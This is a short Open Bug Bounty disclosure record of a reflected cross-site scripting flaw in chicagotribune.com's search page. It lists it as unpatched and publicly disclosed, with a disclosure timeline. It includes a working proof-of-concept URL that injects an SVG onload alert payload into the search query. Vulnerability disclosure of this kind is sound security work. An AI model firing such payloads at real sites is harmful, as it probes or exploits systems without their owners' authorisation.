chicagotribune.com XSS vulnerability

2015-09-07T04:38:00
ID OBB:84881
Type openbugbounty
Reporter Nux
Modified 2015-09-07T05:15:00

Description

Vulnerable URL:
http://www.chicagotribune.com/search/dispatcher.front?Query=%22%3E%3Csvg%2Fonload%3Dalert%28%2Fxssposed.org%2F%29%3E⌖=all&spell;=on
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1588
Google Pagerank| 0
VIP website status:| Yes
Check chicagotribune.com SSL connection:| (Grade: B+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 7 September, 2015 04:38 GMT
Vulnerability existence verified and confirmed| 7 September, 2015 05:15 GMT